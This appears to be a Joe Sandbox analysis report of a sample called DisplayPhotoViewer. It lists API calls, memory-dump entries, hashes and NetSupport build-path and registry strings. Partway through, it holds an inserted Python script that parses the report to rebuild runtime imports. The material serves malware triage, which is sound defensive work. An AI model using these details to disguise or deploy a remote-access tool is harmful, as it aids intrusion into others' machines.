• DeleteObject.GDI32(?), ref: 11005492
• DeleteObject.GDI32(?), ref: 1100549B
• SelectObject.GDI32(?,?), ref: 110054B2
• DeleteObject.GDI32(?), ref: 110054B8
• DeleteDC.GDI32(?), ref: 110054BE
• SelectObject.GDI32(?,?), ref: 110054CF
• DeleteObject.GDI32(?), ref: 110054D8
• DeleteDC.GDI32(?), ref: 110054DE
• DeleteObject.GDI32(?), ref: 110054EF
• DeleteObject.GDI32(?), ref: 1100551A
• DeleteObject.GDI32(?), ref: 11005538
• DeleteObject.GDI32(?), ref: 11005541
• ShowWindow.USER32(?,00000009), ref: 1100556F
• PostQuitMessage.USER32(00000000), ref: 11005577
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
• String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
• API String ID: 2789700732-770455996
• Opcode ID: fec02068b2684296c16b85fa3c25e5961b221962ca71974b36209499a0cae8bc
• Instruction ID: 84781bfd7d2d737226d3b37634ef14c400015b9ceacc9a2dd348c07d7d3561ef
• Opcode Fuzzy Hash: fec02068b2684296c16b85fa3c25e5961b221962ca71974b36209499a0cae8bc
• Instruction Fuzzy Hash: 2B811975A00A05ABD764DBA5CC90EABF7FAAF8C704F00854CF59697241EA71F901CF60
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(WSOCK32.DLL,?,?,00000000), ref: 111231B0
                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 111231C3
                                                                                                    • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 111231E1
                                                                                                    • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112320A
                                                                                                    • GetProcAddress.KERNEL32(00000000,gethostname), ref: 1112322D
                                                                                                    • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 11123256
                                                                                                    • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112327B
                                                                                                    • _calloc.LIBCMT ref: 1112330A
                                                                                                    • _calloc.LIBCMT ref: 111233DA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad_calloc
                                                                                                    • String ID: ..\CTL32\tcputil.c$WSACleanup$WSAStartup$WSOCK32.DLL$gethostbyname$gethostname$ntohl$pGetHostByName$pGetHostName$pWSACleanup$pWSAStartup$pntohl$result$ws2_32.dll
                                                                                                    • API String ID: 1641450247-2903367685
                                                                                                    • Opcode ID: 7cb993d1e83e9a4ae996b1ef20a03ce235162ba660d37093ef0d146e9403f19f
                                                                                                    • Instruction ID: 6087d00816ff521a7ede89fa13ef7d6fec39fc4c939a8a783be3bf39d6db7d70
                                                                                                    • Opcode Fuzzy Hash: 7cb993d1e83e9a4ae996b1ef20a03ce235162ba660d37093ef0d146e9403f19f
                                                                                                    • Instruction Fuzzy Hash: 2D51F479F5835AABD7109F75AC84B8DFBA8AF18704F5040A5E809E7241EF30DA40CF91
                                                                                                    APIs
                                                                                                    • BeginPaint.USER32(?,?), ref: 110151BF
                                                                                                    • GetWindowRect.USER32(?,?), ref: 110151D7
                                                                                                    • _memset.LIBCMT ref: 110151E5
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11015201
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11015215
                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 11015220
                                                                                                    • BeginPath.GDI32(00000000), ref: 1101522D
                                                                                                    • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015250
                                                                                                    • EndPath.GDI32(00000000), ref: 11015257
                                                                                                    • PathToRegion.GDI32(00000000), ref: 1101525E
                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015270
                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015286
                                                                                                    • CreatePen.GDI32(00000000,00000002,?), ref: 110152A0
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110152AE
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110152BE
                                                                                                    • GetRgnBox.GDI32(00000000,?), ref: 110152CB
                                                                                                    • OffsetRgn.GDI32(00000000,?,00000000), ref: 110152EA
                                                                                                    • FillRgn.GDI32(00000000,00000000,?), ref: 110152F9
                                                                                                    • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 1101530C
                                                                                                    • DeleteObject.GDI32(00000000), ref: 11015319
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015323
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1101532D
                                                                                                    • DeleteObject.GDI32(?), ref: 11015336
                                                                                                    • DeleteObject.GDI32(?), ref: 1101533F
                                                                                                    • DeleteObject.GDI32(?), ref: 11015348
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015352
                                                                                                    • DeleteObject.GDI32(?), ref: 1101535B
                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 11015365
                                                                                                    • EndPaint.USER32(?,?), ref: 11015379
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3702029449-0
                                                                                                    • Opcode ID: 2420055481e3087034d74504e6d6d1f2a4fcafd9da687936ea4821084bf5318b
                                                                                                    • Instruction ID: c89f8f6d2c297e06aa031e3ba13a6c291ea51ce0acca84c20c64d9c01cb23816
                                                                                                    • Opcode Fuzzy Hash: 2420055481e3087034d74504e6d6d1f2a4fcafd9da687936ea4821084bf5318b
                                                                                                    • Instruction Fuzzy Hash: 2C510C75A01228AFDB11DBA4DC89FAEB7B9FF89304F008199F919D7244DB749A40CF61
                                                                                                    APIs
                                                                                                      • Part of subcall function 10701A40: GetModuleFileNameA.KERNEL32(?,?,00000100), ref: 10701A6D
                                                                                                      • Part of subcall function 10701A40: wsprintfA.USER32 ref: 10701AA7
                                                                                                    • LoadLibraryA.KERNEL32(CAPI2032.DLL), ref: 10702CBE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileLibraryLoadModuleNamewsprintf
                                                                                                    • String ID: *TraceCAPIData$CAPI2032.DLL$CAPI_GET_MESSAGE$CAPI_PUT_MESSAGE$CAPI_REGISTER$CAPI_RELEASE$CAPI_WAIT_FOR_SIGNAL$E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C$PCICAPI$hCapiInst == 0$hDataRead$hDataSent
                                                                                                    • API String ID: 2847869325-2115638456
                                                                                                    • Opcode ID: e3587d23cc25a2f6e2666d4714a1e94978e5458b5bd036f90ed6d2df47c088e0
                                                                                                    • Instruction ID: bb0bce3ff9b39605e519b0173b4f6ac2e7c18a95d600b38cca7560323b6237f2
                                                                                                    • Opcode Fuzzy Hash: e3587d23cc25a2f6e2666d4714a1e94978e5458b5bd036f90ed6d2df47c088e0
                                                                                                    • Instruction Fuzzy Hash: F74181B1A00124AFC750EF69ECC5D5A7BECEB8D710B04861BF904D76E0DBB458928B99
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,218EC38C), ref: 110BB40D
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadExecutionState), ref: 110BB451
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110BB46C
                                                                                                    • SystemParametersInfoA.USER32(00000010,00000000,?,00000000), ref: 110BB483
                                                                                                    • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 110BB48F
                                                                                                    • OleInitialize.OLE32(00000000), ref: 110BB4CB
                                                                                                    • LoadAcceleratorsA.USER32(00000000,00003330), ref: 110BB593
                                                                                                    • UpdateWindow.USER32(?), ref: 110BB5FD
                                                                                                    • OleUninitialize.OLE32 ref: 110BB67E
                                                                                                    • GetProcAddress.KERNEL32(?,SetThreadExecutionState), ref: 110BB692
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110BB6AA
                                                                                                    • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 110BB6BB
                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 110BB6E9
                                                                                                      • Part of subcall function 110B4C40: GetWindowPlacement.USER32(?,0000002C,75BF7AA0), ref: 110B4C7F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoParametersSystem$AddressErrorLastLibraryLoadProcWindow$AcceleratorsFreeInitializePlacementUninitializeUpdate
                                                                                                    • String ID: ..\CTL32\NSMCobrowse.cpp$1601$FALSE$Kernel32.dll$NSMCobrowse$SetThreadExecutionState$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 3244972839-2715558161
                                                                                                    • Opcode ID: 7f52ecf40b297e53c9b4e9c1e6d8453b61dafc84af1a0769bdafa4072ebf4ef3
                                                                                                    • Instruction ID: 26fd531c787839105b2f7391d4ac46bcb53eb714db5ed801b511f777656faf0a
                                                                                                    • Opcode Fuzzy Hash: 7f52ecf40b297e53c9b4e9c1e6d8453b61dafc84af1a0769bdafa4072ebf4ef3
                                                                                                    • Instruction Fuzzy Hash: 3F91A8B9E00619AFDB11DFA9CCC0AAEFBF5FF48308F50446DE915A7241DB3469408BA5
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(snmpapi.dll,?,00000000), ref: 11123829
                                                                                                    • GetProcAddress.KERNEL32(00000000,SnmpUtilOidCpy), ref: 11123854
                                                                                                    • GetProcAddress.KERNEL32(00000000,SnmpUtilOidNCmp), ref: 11123861
                                                                                                    • GetProcAddress.KERNEL32(00000000,SnmpUtilVarBindFree), ref: 1112386E
                                                                                                    • LoadLibraryA.KERNEL32(INETMIB1.DLL), ref: 1112389C
                                                                                                    • GetProcAddress.KERNEL32(00000000,SnmpExtensionInit), ref: 111238B4
                                                                                                    • GetProcAddress.KERNEL32(00000000,SnmpExtensionQuery), ref: 111238C1
                                                                                                    • GetTickCount.KERNEL32 ref: 111238EB
                                                                                                    • _calloc.LIBCMT ref: 1112391B
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1112398D
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 11123996
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad$CountTick_calloc
                                                                                                    • String ID: ..\CTL32\tcputil.c$INETMIB1.DLL$SnmpExtensionInit$SnmpExtensionQuery$SnmpUtilOidCpy$SnmpUtilOidNCmp$SnmpUtilVarBindFree$result$snmpapi.dll
                                                                                                    • API String ID: 1437035542-3101287369
                                                                                                    • Opcode ID: 03e33bb970821ad0e55315ceb1104e4096a4305a235bf1089583c03d4f6de025
                                                                                                    • Instruction ID: b68639ff2920384e4de60b90151fb2a4e96aa4104bba318c13446934c76ee4ab
                                                                                                    • Opcode Fuzzy Hash: 03e33bb970821ad0e55315ceb1104e4096a4305a235bf1089583c03d4f6de025
                                                                                                    • Instruction Fuzzy Hash: F841D275B146159BCF11DFA5EDC0AAEFBB8EB4D318F9000BAE90997240EA309A01CF51
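The function listings above share one pattern that matters for triage: each resolves its imports at runtime (LoadLibraryA followed by GetProcAddress for ws2_32.dll, CAPI2032.DLL, Kernel32.dll, snmpapi.dll and INETMIB1.DLL), so the static import directory of the dropped module says nothing about Winsock, SNMP or SetThreadExecutionState use, and each carries build-path strings (..\CTL32\tcputil.c, E:\nsmsrc\nsm\...\PCICAPI.C, ..\CTL32\NSMCobrowse.cpp, ...\ctl32\wndclass.h) in its String ID entry. The script below is an added example, not part of the Joe Sandbox report and not NetSupport's code: it parses report lines in exactly this format, rebuilds the per-DLL dynamic import set from the LoadLibrary/GetProcAddress sequence (it also accepts GetModuleHandle lines, as in the CRT block that follows), and pulls out the String ID entries that look like ctl32 or nsmsrc\nsm source paths. The input is a trimmed copy of the listings above; the `netsupport_build_paths` flag is a heuristic of this example keyed on the nsmsrc path, not something the report itself computes.

```python
import re
from collections import defaultdict
from pprint import pprint

# Regexes over the report's own line format: "• API.MODULE(args), ref: addr".
LOAD_RE = re.compile(r'(?:LoadLibrary[AW]|GetModuleHandle[AW])\.KERNEL32\(([^,)]+)')
PROC_RE = re.compile(r'GetProcAddress\.KERNEL32\([^,)]*,([^,)]+)\)')
STRID_RE = re.compile(r'^String ID:\s*(.*)$')
# Build-path strings of the kind the report lists: ctl32\<file>.c/.cpp/.h or nsmsrc\nsm.
SRCPATH_RE = re.compile(r'(?i)(?:\\|^)ctl32\\\w+\.(?:c|cpp|h)\b|nsmsrc\\nsm')

# Constructed sample: a trimmed copy of the four function listings above.
SAMPLE = r"""
APIs
• LoadLibraryA.KERNEL32(ws2_32.dll), ref: 111231C3
• GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 111231E1
• GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112320A
• GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 11123256
• String ID: ..\CTL32\tcputil.c$WSACleanup$WSAStartup$WSOCK32.DLL$ws2_32.dll
APIs
• LoadLibraryA.KERNEL32(CAPI2032.DLL), ref: 10702CBE
• String ID: *TraceCAPIData$CAPI2032.DLL$E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C$PCICAPI
APIs
• LoadLibraryA.KERNEL32(Kernel32.dll,218EC38C), ref: 110BB40D
• GetProcAddress.KERNEL32(00000000,SetThreadExecutionState), ref: 110BB451
• SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 110BB48F
• String ID: ..\CTL32\NSMCobrowse.cpp$Kernel32.dll$NSMCobrowse$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h
APIs
• LoadLibraryA.KERNEL32(snmpapi.dll,?,00000000), ref: 11123829
• GetProcAddress.KERNEL32(00000000,SnmpUtilOidCpy), ref: 11123854
• LoadLibraryA.KERNEL32(INETMIB1.DLL), ref: 1112389C
• GetProcAddress.KERNEL32(00000000,SnmpExtensionInit), ref: 111238B4
• String ID: ..\CTL32\tcputil.c$INETMIB1.DLL$snmpapi.dll
"""


def parse_report(text):
    """Split the listing into per-function blocks (each starts with 'APIs').
    For every block collect (library, export) pairs resolved at runtime, where the
    library is the most recent LoadLibrary/GetModuleHandle argument in that block,
    plus the String ID entries that look like source-file paths."""
    blocks, cur, cur_lib = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip('•').strip()
        if line == 'APIs':
            cur, cur_lib = {'procs': [], 'src_paths': []}, None
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = LOAD_RE.search(line)
        if m:
            cur_lib = m.group(1).strip().lower()
        m = PROC_RE.search(line)
        if m:
            cur['procs'].append((cur_lib, m.group(1).strip()))
        m = STRID_RE.match(line)
        if m:
            cur['src_paths'] += [s for s in m.group(1).split('$') if SRCPATH_RE.search(s)]
    return blocks


def triage(blocks):
    """Aggregate across blocks: which exports are resolved from which DLL (the
    dynamic import table the PE import directory does not show) and the build
    paths that identify the originating code base."""
    imports = defaultdict(set)
    paths = set()
    for b in blocks:
        for lib, proc in b['procs']:
            imports[lib or '<unknown>'].add(proc)
        paths.update(b['src_paths'])
    return {
        'dynamic_imports': {lib: sorted(v) for lib, v in sorted(imports.items())},
        'source_paths': sorted(paths),
        # Heuristic of this example (assumption): nsmsrc\nsm paths are NetSupport build residue.
        'netsupport_build_paths': any('nsmsrc' in p.lower() for p in paths),
    }


if __name__ == '__main__':
    pprint(triage(parse_report(SAMPLE)))
```

A library that is loaded but has no GetProcAddress line in the same block (CAPI2032.DLL in the sample) does not appear in `dynamic_imports`; that is deliberate, since the listing gives no export name to attribute to it. To run this over a full report, paste the API listings into `SAMPLE` or read them from a file.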
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11161134
                                                                                                    • __mtterm.LIBCMT ref: 11161140
                                                                                                      • Part of subcall function 11160E0B: DecodePointer.KERNEL32(0000001C,1115ED5F,1115ED45,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11160E1C
                                                                                                      • Part of subcall function 11160E0B: TlsFree.KERNEL32(00000049,1115ED5F,1115ED45,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11160E36
                                                                                                      • Part of subcall function 11160E0B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,1115ED5F,1115ED45,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11168C16
                                                                                                      • Part of subcall function 11160E0B: _free.LIBCMT ref: 11168C19
                                                                                                      • Part of subcall function 11160E0B: DeleteCriticalSection.KERNEL32(00000049,?,?,1115ED5F,1115ED45,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11168C40
                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 11161156
                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 11161163
                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 11161170
                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1116117D
                                                                                                    • TlsAlloc.KERNEL32(?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 111611CD
                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 111611E8
                                                                                                    • __init_pointers.LIBCMT ref: 111611F2
                                                                                                    • EncodePointer.KERNEL32(?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11161203
                                                                                                    • EncodePointer.KERNEL32(?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11161210
                                                                                                    • EncodePointer.KERNEL32(?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 1116121D
                                                                                                    • EncodePointer.KERNEL32(?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 1116122A
                                                                                                    • DecodePointer.KERNEL32(Function_00160F8F,?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 1116124B
                                                                                                    • __calloc_crt.LIBCMT ref: 11161260
                                                                                                    • DecodePointer.KERNEL32(00000000,?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 1116127A
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1116128C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                    • API String ID: 3698121176-3819984048
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$CountFindForegroundSleepTickwsprintf$ErrorLast
                                                                                                    • String ID: Here 2 (%d)$MMPlayer$PCIVideo.exe /x /w"%s"$PCIVideoSlave32$PCIVideoSlave:0x%x$PCIVideoVi.exe /x /w"%s"$SlaveClass$SlavePlayer$SlaveWindow
                                                                                                    • API String ID: 4235248531-48387523
                                                                                                    APIs
                                                                                                      • Part of subcall function 110E6100: RegOpenKeyExA.ADVAPI32(?,00000056,00000000,00020019,?,00000000,00000001,00000000,?,1102EC16,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E611C
                                                                                                      • Part of subcall function 110C8DD0: _malloc.LIBCMT ref: 110C8DEA
                                                                                                      • Part of subcall function 110E5D70: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110E5DBB
                                                                                                    • wsprintfA.USER32 ref: 11029A5D
                                                                                                      • Part of subcall function 110E64D0: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,11029835), ref: 110E6506
